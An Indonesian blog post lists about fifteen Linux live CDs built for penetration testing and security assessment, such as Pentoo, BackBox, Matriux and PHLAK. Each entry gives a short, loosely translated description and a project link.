Hacking Live CD adalah salah satu distribusi Linux yang diisi dengan alat-alat baru dan utilitas untuk ethical hacking, penetration testing and verification countermeasure. Berdasarkan Ubuntu livecd dan dijalankan seperti "berjalan langsung dari CD dan tidak memerlukan instalasi pada hard drive Anda Setelah dimulai. Anda bisa menggunakan alat termasuk untuk test, verify, ethically hack dan perform penetration tests pada jaringan Anda sendiri untuk memastikan dia aman dari penyusup luar.
http://www.livehacking.com/live-hacking-cd
Pentoo
Pentoo adalah Live CD dan Live USB dirancang untuk menguji penetrasi dan evaluasi keamanan. Basednya adalah Gentoo Linux, Pentoo memiliki versi 32 dan 64 bit livecd. Memiliki driver injeksi paket update Wi-Fi, GPGPU perangkat lunak cracking [2], dan banyak alat untuk pengujian penetrasi dan evaluasi keamanan.
http://www.pentoo.ch/
Network Security Toolkit
Selamat datang di Network Security Toolkit (NST). ISO ini bootable live CD / DVD (Live NST) didasarkan pada Fedora. Manual ini dirancang untuk memberikan akses mudah ke best-of-breed Aplikasi Sumber Terbuka, Keamanan Jaringan dan berjalan pada platform yang paling x86/x86_64.
http://www.networksecuritytoolkit.org/nst/
OWASP Live CD
OWASP LiveCD, merupakan proyek yang menyatukan beberapa proyek terbaik dari keamanan open source dalam CD tunggal. Web developer, tester dan profesional keamanan dapat mulai dari LiveCD ini dan memiliki akses ke set lengkap uji keselamatan. Hal ini memungkinkan pengguna Anda untuk menguji berbagai masalah keamanan aplikasi web dan situs web.
http://appseclive.org
Arudius
Arudius adalah Linux liveCD dengan alat-alat untuk pengujian penetrasi dan analisis kerentanan. Apa yang disebut "Linux liveCD" pada dasarnya adalah sistem operasi Linux, yang dinyalakan dan dijalankan langsung dari CD-ROM standar. Hal ini memungkinkan untuk meningkatkan portabilitas dan sistem operasi untuk menjalankan berbagai perangkat lunak Linux di hampir semua sistem fisik tanpa mempengaruhi sistem host operasi yang terpasang pada hard disk. Ini adalah konsep yang menggali Arudius juga. Saat ini, Arudius memiliki alat keamanan yang lebih dari 140 dan pengemasan yang berbeda
http://www.tdisecurity.com/tdi-labs/arudius.htm
WeakNet
WeakNet Linux, dirancang terutama untuk pengujian penetrasi, forensik dan tugas-tugas keamanan lainnya. Lingkungan desktop default adalah GNOME.
http://weaknetlabs.com/main/
Backbox
Backbox adalah distribusi Linux berbasis Ubuntu LTS 10.04 Lucid dirancang untuk melakukan tes penetrasi dan penilaian keamanan. Dirancang untuk menjadi cepat, mudah digunakan dan minim,tetapi belum lengkap karena repositori sendiri perangkat lunak desktop selalu upgrade ke versi stabil terbaru dari alat terbaik dikenal dan paling sering digunakan etical hacking.
www.backbox.org/public/
Matriux
Matriux adalah distribusi keamanan dengan semua sumber daya yang terdiri dari banyak open source yang kuat dan tools gratis yang dapat digunakan untuk berbagai tujuan, termasuk namun tidak terbatas pada, penetration testing, ethical hacking, system and network administration, cyber forensic investigations, security testing, vulnerability analysis, dan banyak lagi. Ini adalah distribusi dirancang bagi para profesional keamanan dan penggemar, walaupun biasanya dapat digunakan sebagai sistem desktop default Anda. Dengan Matriux, Anda dapat mengubah sistem apapun menjadi kuat set alat untuk pengujian penetrasi, tanpa harus menginstal perangkat lunak apapun pada hardisk Anda. Matriux dirancang untuk bekerja dalam lingkungan hidup sebagai tongkat, CD / DVD atau USB atau dapat dengan mudah diinstal pada hard drive anda dalam beberapa langkah. Matriux juga mencakup seperangkat alat untuk forensik komputer dan pemulihan data yang dapat digunakan untuk analisis forensik dan penelitian dan pemulihan data.
http://www.matriux.com
Secmic
Secmic adalah liveCD keamanan distribusi Linux yang dapat digunakan oleh profesional keamanan atau untuk tujuan pendidikan. Hal ini gratis untuk men-download, dan selalu akan. Ini terdiri dari lebih dari 200 aplikasi keamanan yang berorientasi dan menjaga open source Ubuntu / Kubuntu update kompatibilitas, berarti Anda akan dapat menerima update keamanan langsung dari repositori Ubuntu / Kubuntu.
http://sourceforge.net/p/secmic/home//index.html
Distribusi alat-alat keamanan
DTS adalah berbasis Linux Security Tool. Memang, itu adalah kumpulan dari ratusan bahkan ribuan alat keamanan untuk open source. Ini adalah distro Linux LiveCD, yang berarti berjalan dari CD di memori tanpa mengubah sistem operasi asli dari komputer host. Satu-satunya tujuan dalam hidup adalah untuk menempatkan sebagai alat keamanan banyak yang Anda inginkan.
http://s-t-d.org
NetSecL
NetSecL Linux adalah dengan setup default dengan distribusi meninggalkan mengeras ke tingkat keamanan yang masih digunakan dan menyediakan peralatan yang diperlukan untuk menguji keamanannya. GrSecurity firewall dan itu merupakan ciri yang membuat distribusi eksklusif dengan paket dibangun khusus: Amap, ettercap, Hydra, Kismet, Nessus, Nmap, Metasploit, PADS.
http://netsecl.linuxfreedom.com
VAST
VAST adalah VIPER distribusi laboratorium yang berisi alat VIPER hidup dikembangkan sebagai UCsniff, videosnarf videojak, dan banyak lagi. Seiring dengan alat VIPER dan alat-alat lain keamanan penting VoIP, juga berisi alat untuk penguji penetrasi digunakan sebagai Metasploit, Nmap dan Hydra.é distribusi pekerjaan yang sedang berjalan.
http://vipervast.sourceforge.net
Blackbuntu
Blackbuntu adalah distribusi pengujian penetrasi yang telah dirancang khusus untuk mahasiswa dan pelatihan keamanan informasi keamanan profesional.
Blackbuntu adalah distribusi pengujian penetrasi dengan GNOME Desktop Environment. Saat ini sedang dibangun menggunakan Ubuntu 10.10 dan bekerja referensi pada Back | Track. Itu dibuat hanya untuk sebagai hobi saja.
http://www.blackbuntu.com/
PHLAK
PHLAK atau [P] rofessional [H] Acker's [L] inux [A] ssault [K] itu adalah keamanan modular dari distribusi Linux (aka LiveCD). PHLAK dilengkapi dengan dua lingkungan (fluxbox dan xfce4), alat-alat keamanan banyak, dan buku catatan penuh dokumentasi keamanan. PHLAK adalah turunan dari Morphix, dibuat oleh Alex de Landgraaf.
Terutama di sekitar Penetrasi Testing, PHLAK adalah sistem yang setiap hacker atau pentest harus dimiliki.
http://sourceforge.net/projects/phlakproject/
Download versi terbaru 0,3 - ftp://ftp.ussg.iu.edu/linux/phlak/phlak-0.3.iso>
STD 0.1
STD adalah berbasis Linux Security Tool. Memang, itu adalah kumpulan dari ratusan bahkan ribuan alat keamanan untuk open source. Ini adalah Live Linux Distro, yang berarti berjalan dari CD di memori tanpa mengubah sistem operasi asli dari komputer host. Satu-satunya tujuan dalam hidup adalah untuk menempatkan sebagai alat keamanan banyak yang Anda inginkan dengan mudah menggunakan antarmuka.
DST adalah untuk digunakan baik oleh pemula dan admin keamanan profesional tetapi tidak ideal bagi Pengguna yang belum pernah menggunakan Linux. DST mengasumsikan Anda tahu dasar-dasar Linux karena sebagian besar karyanya akan dilakukan dari baris perintah. Jika Anda benar-benar baru untuk Linux, Anda sebaiknya mulai dengan distro hidup seperti Knoppix untuk berlatih dasar-dasar.
DTS dirancang untuk membantu administrator jaringan dan profesional melindungi jaringan mereka
http://s-t-d.org/index.html
nUbuntu
nUbuntu atau Network Ubuntu adalah jauh lebih seorang pemula di arena sebagai LiveCD Ubuntu, yang didasarkan, cukup baru sendiri.
Tujuan utama dari nUbuntu adalah untuk membuat distribusi yang berasal dari distribusi Ubuntu, dan menambahkan paket yang terkait dengan pengujian keamanan, dan menghapus paket yang tidak diperlukan, seperti Gnome, Openoffice.org, and Evolution. nUbuntu merupakan hasil dari ide dua orang harus membuat distribusi baru untuk pengalaman belajar.
http://www.nubuntu.org/
Jadi Distro manakah yang pas untuk kamu ?
Langganan:
Postingan (Atom)